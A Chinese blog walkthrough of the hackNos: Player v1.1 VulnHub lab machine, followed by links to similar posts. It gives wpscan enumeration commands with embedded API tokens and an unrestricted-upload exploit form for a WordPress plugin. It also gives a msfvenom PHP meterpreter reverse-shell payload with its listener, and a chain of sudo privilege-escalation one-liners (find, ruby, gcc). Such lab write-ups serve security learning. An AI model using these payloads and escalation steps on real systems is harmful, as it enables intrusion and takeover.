VulnHub:Hacknos-Player V1.1靶机

最新推荐文章于 2024-09-02 16:33:09 发布
最新推荐文章于 2024-09-02 16:33:09 发布
阅读量367 收藏 7
点赞数 5
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wbplife/article/details/140390009
版权

靶机下载:hackNos: Player v1.1 ~ VulnHub

靶机目标:root用户目录下的root.txt

一、信息收集

步骤一:靶机发现与端口扫描

netdiscover -i eth0 -r 192.168.7.0/24

页面访问

发现了一个网站目录:“g@web” 通过插件得知网站是WordPress 5.3.11

尝试使用wpscan列出站点的用户和密码...发现该站点的一个WP Json Api地址访问...可在描述字段中发现一个密码hackNos@9012!!对其默认后台登录界面访问并尝试登录...

wpscan --url http://192.168.7.39/g@web -e u --api-token NCpd6sIerdVHZ48sTMJ4RIeawnhpImnOrjaxXiXgIX0

网页访问这个地址

使用wpscan对其网站进行漏洞扫描...发现远程代码执行漏洞...对其利用信息访问...拿取到POC并修改保存成HTML文件....

wpscan --url http://192.168.7.39/g@web/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

发现远程代码执行漏洞!

打开根据提供的网址,看到了利用代码

复制下来,对url地址略作修改,得到:

<form method="post" enctype="multipart/form-data" action="http://192.168.7.39/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

将其保存为本地的一个html文件,然后用浏览器打开它,如下图,是一个文件上传

二、Getshell

使用MSF生成PHP木马并开启监听

生成木马文件中的IP为kali的

生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.117 LPORT=4444 x> shell.phtml

开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST  192.168.7.117
set LPORT  4444
exploit

从文件可知,文件格式支持phtml格式

根据利用代码得知,上传的文件在:/wp-content/uploads/wpsp

鼠标单击文件,获取shell

python -c 'import pty; pty.spawn("/bin/bash")'

三、提权

查看/home目录下的用户信息并使用之前的获取的密码进行登录...发现是Security用户的密码...发现hunter用户下的user.txt文件...暂时没有访问权限....

hackNos@9012!!

sudo提权

1、第一次sudo提权

执行命令:sudo -l

提示可以通过用户hacknos进行find提权,而靶机上只有hackNos-boat、hunter、security三个用户,因此这里的用户hacknos指的应该是hackNos-boat

如下图,切换hackNos-boat成功
通过网站 find | GTFOBins 获知提权命令:

sudo -u hackNos-boat find . -exec /bin/bash \; -quit

2、第二次提权

在hackNos-boat用户下面执行sudo -l 命令,发现ruby提权

sudo -u hunter ruby -e 'exec "/bin/sh"'

3、第三次提权

在hunter用户下面执行sudo -l 命令,发现gcc提权

sudo gcc -wrapper /bin/sh,-s .

获取所有Flag

wbplife
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机HACKNOS_ PLAYER V1.1
LainWith的博客
02-12 1268
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan列出站点的用户名、账号wpscan漏扫网站Getshell提权sudo提权获取所有Flag 介绍 系列: hackNos(此系列共7台) 发布日期:2020年04月10日 难度:初级-中级 Flag : 1个,根用户的root.txt 学习: wordpress 安全测试 远程代码执行 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 信息收集 主机发现 arp-
Vulnhub靶机HACKNOS_ RECONFORCE (V1.1)
LainWith的博客
02-05 1986
目录介绍信息收集主机发现主机信息探测测试21(ftp)访问网站目录扫描登录爆破命令执行反弹shellFlag1切换身份提权获取Flag2方法1:sudo提权方法2:docer提权参考 介绍 系列: hackNos(此系列共7台) 发布日期:2019 年 11 月 29 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: msf爆破网站登录框 命令执行漏洞 msf反弹shell sudo提权、docker提权 靶机地址:https://www.vulnhub.com/entry
看完这篇 教你玩转渗透测试靶机vulnhub——HackNos-2.1
Aluxian_的博客
10-22 1350
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。1.信息收集,端口扫描2.文件包含的利用3.john爆破获取密码4.Sudo su提权这个靶机比较简单啦 希望对刚入门得小白有帮助!🙂最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
Vulnhub——HackNos-2.1
2301_76786857的博客
06-15 134
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
Vulnhub靶机HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3197
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
hackNos: Player v1.1靶机渗透
siaowei44的博客
07-26 509
概述 该靶机 下载地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 准备事项:在vulnhub下载的靶机很多时候都无法获得ip地址,这个问题困扰我很久,今天我探寻到一个有效的解决办法https://blog.csdn.net/asstart/article/details/103433065?utm_source=app ip地址 操作系统 靶机 192.168.74.198 Ubuntu 攻击主机 .
Vulnhub:Player-v1.1靶机
qq_43884092的博客
02-06 84
访问80端口发现存在一个目录,wpscan扫描发现存在一个插件,和一个用户:`wp-local`,该插件存在越权,
Vulnhub-GlasgowSmile:v-1.1
cr7lyl的博客
12-25 1933
记一次vulnhub的通关过程 对主机全面扫描: 只有22和80端口开启 然后对其进行目录扫描,在扫描时访问web服务(8.
vulnhub靶机 Os-hackNos-1
witwitwiter的博客
08-24 2235
vulnhub靶机 Os-hackNos-1 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 在将靶机文件下载下来为Os-hackNos-1.ova 使用vm打开这个ova文件进行导入。导入完成后,若是遇到无法获取ip地址,则需要在启动界面点击shift进入如下界面按下e 向下翻动,将ro改为rw single init=/bin/bash 然后按下 ctr
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub:SUNSET-DAWN靶机
logan_logan的博客
06-06 520
1.在浏览器中输入目标靶机IP地址,浏览网页 2.端口扫描 发现开启了samba服务,接下来对samba服务进行枚举; nmap -p- 192.168.31.130 nmap -sC -sV -p 139,445,3306,12345 192.168.31.130 对samba服务枚举得时候发现了ITDEPT共享目录,不需要密码就可以登录 enum4linux -a -o 192.168.31.130 登录samba后,发现并没有文件存在,但是这个目录可以上传文件; smbclient
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8443
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Web安全之XSS跨站脚本攻击
good good study day day up
08-29 1894
XSS漏洞简介、原理、攻击方式、危害、常用标签、绕过技巧、防御
【补-网络安全】日常运维(二)终端端口占用排查
最新发布
Ryoujou的博客
09-02 145
端口占用及开放情况
网络安全】漏洞挖掘
anquan2233的博客
08-29 1308
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全售前入门08安全服务——Web漏洞扫描服务
打工人
08-31 579
Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASP TOP 10等主流安全漏洞。
人工智能在网络安全领域的应用探索
A526847的博客
08-29 1190
随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值